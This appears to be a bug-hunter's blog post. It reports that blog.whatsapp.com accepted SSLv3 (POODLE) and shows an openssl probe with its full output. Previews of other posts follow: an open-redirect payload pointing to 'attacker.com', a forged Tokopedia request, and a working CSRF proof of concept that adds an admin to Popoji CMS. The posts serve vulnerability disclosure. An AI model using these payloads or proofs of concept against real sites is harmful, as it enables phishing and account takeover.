SSLv3 Poodle Vulnerability On WhatsApp.com & Blog.WhatsApp.com

What is the POODLE attack?

Padding Oracle On Downgraded Legacy Encryption (POODLE) is an issue that affects SSL 3.0. If an adversary can modify network transmissions between the client and the server they can downgrade the SSL connection to SSL 3.0 and tamper with/decrypt data in transmission.

The actual problem stems from the fact that the block cipher padding in CBC encryption in SSL 3.0 is not fully verified during the decryption process.

Is WhatsApp.com & Blog.WhatsApp.com vulnerable to POODLE?


root@pasuruanblackhat:/home/shan# openssl s_client -connect blog.whatsapp.com:443 -ssl3

Output :  

CONNECTED(00000003)
depth=2 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA
verify return:1
depth=1 C = US, O = DigiCert Inc, CN = DigiCert SHA2 Secure Server CA
verify return:1
depth=0 C = US, ST = California, L = Santa Clara, O = "WhatsApp, Inc.", CN = *.whatsapp.com
verify return:1
---
Certificate chain
0 s:/C=US/ST=California/L=Santa Clara/O=WhatsApp, Inc./CN=*.whatsapp.com
i:/C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
1 s:/C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
i:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert Global Root CA
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIFJjCCBA6gAwIBAgIQBVDDa7GxLjszOo2izKc2FjANBgkqhkiG9w0BAQsFADBN
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMScwJQYDVQQDEx5E
aWdpQ2VydCBTSEEyIFNlY3VyZSBTZXJ2ZXIgQ0EwHhcNMTYwNjE2MDAwMDAwWhcN
MTkwOTA5MTIwMDAwWjBqMQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5p
YTEUMBIGA1UEBxMLU2FudGEgQ2xhcmExFzAVBgNVBAoTDldoYXRzQXBwLCBJbmMu
MRcwFQYDVQQDDA4qLndoYXRzYXBwLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEP
ADCCAQoCggEBANNq/Wj47PE6K20BfJL3mDf2/DoZkUoZqH+Fp2tGsuGjZvZjT+eQ
g88AAKd6aEg4BArnw9WW9CqVIbUE5MMjzVaBks00DzJnfmTZQVIILkMtKtPClXr2
IDYQ+jbyGC7l8WpAea44XRokjmShhaLE392Jm6kC6cykXEq8olqJxXRtFOV+cbiX
+dDRBvDMpMtm1aiM4SUnSz+A2xwUyuy4NYn25i424zuanAOUGOLpHWZNT3TSWBab
RM2dglOthRC/czq/HJ5FzKeKwD6rxzHO72CsGZ4Dvat9TAi20ooLOoTPUKhpoNcp
BGVfjmVPPaRcZI2BD+Nh4LBrny0plM50/XMCAwEAAaOCAeMwggHfMB8GA1UdIwQY
MBaAFA+AYRyCMWHVLyjnjUY4tCzhxtniMB0GA1UdDgQWBBQz+s7vmZYP3Vw6l6wq
2tZlKOp/mDAnBgNVHREEIDAegg4qLndoYXRzYXBwLmNvbYIMd2hhdHNhcHAuY29t
MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIw
awYDVR0fBGQwYjAvoC2gK4YpaHR0cDovL2NybDMuZGlnaWNlcnQuY29tL3NzY2Et
c2hhMi1nNS5jcmwwL6AtoCuGKWh0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zc2Nh
LXNoYTItZzUuY3JsMEwGA1UdIARFMEMwNwYJYIZIAYb9bAEBMCowKAYIKwYBBQUH
AgEWHGh0dHBzOi8vd3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCAYGZ4EMAQICMHwGCCsG
AQUFBwEBBHAwbjAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29t
MEYGCCsGAQUFBzAChjpodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNl
cnRTSEEyU2VjdXJlU2VydmVyQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcN
AQELBQADggEBAGLNjnV3CIW7xT0OhLQQdGVeMnlqTPnsXjVZlP6fKDB1T0uDoRpS
HpvZdN8G0U1HFeqcuFAn+U4iLhMwhqOKwHZc6kyMzIgF8t/HnnPgbwPWSDA1GL5m
lg+GN16aJK/NOFBmr2PYV6m0O3flVii+VL9H91pGuT6SMfgaLQOuGU92iKcs2EO0
gPOu3EautX+MGKxerD9hV4QSLhNt386SY5BE7ssu368XFI1woHZpUTzSR44jmNqZ
VkZKwxI56W1pMtoCtJz0nV3CURAsm5eD/VP3PdmqcrRWCL5fRx/gVfOPxTR3huyL
Ek0LpFD0WPyCpZe1NYF20SFhP4jPinwA2xA=
-----END CERTIFICATE-----
subject=/C=US/ST=California/L=Santa Clara/O=WhatsApp, Inc./CN=*.whatsapp.com
issuer=/C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
---
No client certificate CA names sent
Server Temp Key: ECDH, P-256, 256 bits
---
SSL handshake has read 3022 bytes and written 306 bytes
---
New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : SSLv3
Cipher : ECDHE-RSA-AES128-SHA
Session-ID: AAE9DA17B541DD565A1EB801BA0971F1F032681D8A7DE59735BC0557F17A9E07
Session-ID-ctx: 
Master-Key: A1835B491468B963556730890740F24755C8BA89B48896CBB3616B8C8DBD2E1E1226B89EF023587D8FB629EB8CF0772F
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
Start Time: 1491902165
Timeout : 7200 (sec)
Verify return code: 0 (ok)
---

How Much Bounty ? 

Sadly, this is not get the bounty.


Unlucky Me.

Reference :

Comments

Post a Comment

Popular posts from this blog

Open Redirect On Codepolitan.com

Image
Open Redirect On Codepolitan.com Description :  Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. Impact : Force user go to untrusted website from codepolitan website Location of bug :  https://www.codepolitan.com/users/login?callback= Payload : http://attacker.com Reproduce : 1. Open https://www.cod...
Read more

Tokopedia - CSRF On Open Store

Image
CSRF Issue On Tokopedia,  List of bug on Tokopedia : - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html Halo, Saya menemukan sebuah bug CSRF di tokopedia Pendahuluan bug ini bisa mengubah user picture di login seal Vuln Request: POST /ajax/shop/shop-status.pl?action=event_re_open HTTP/1.1 Host: www.tokopedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 33 Origin: null Cookie: Some Cookie Connection: close action=event_re_open&s_id=[id toko]...
Read more

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th...
Read more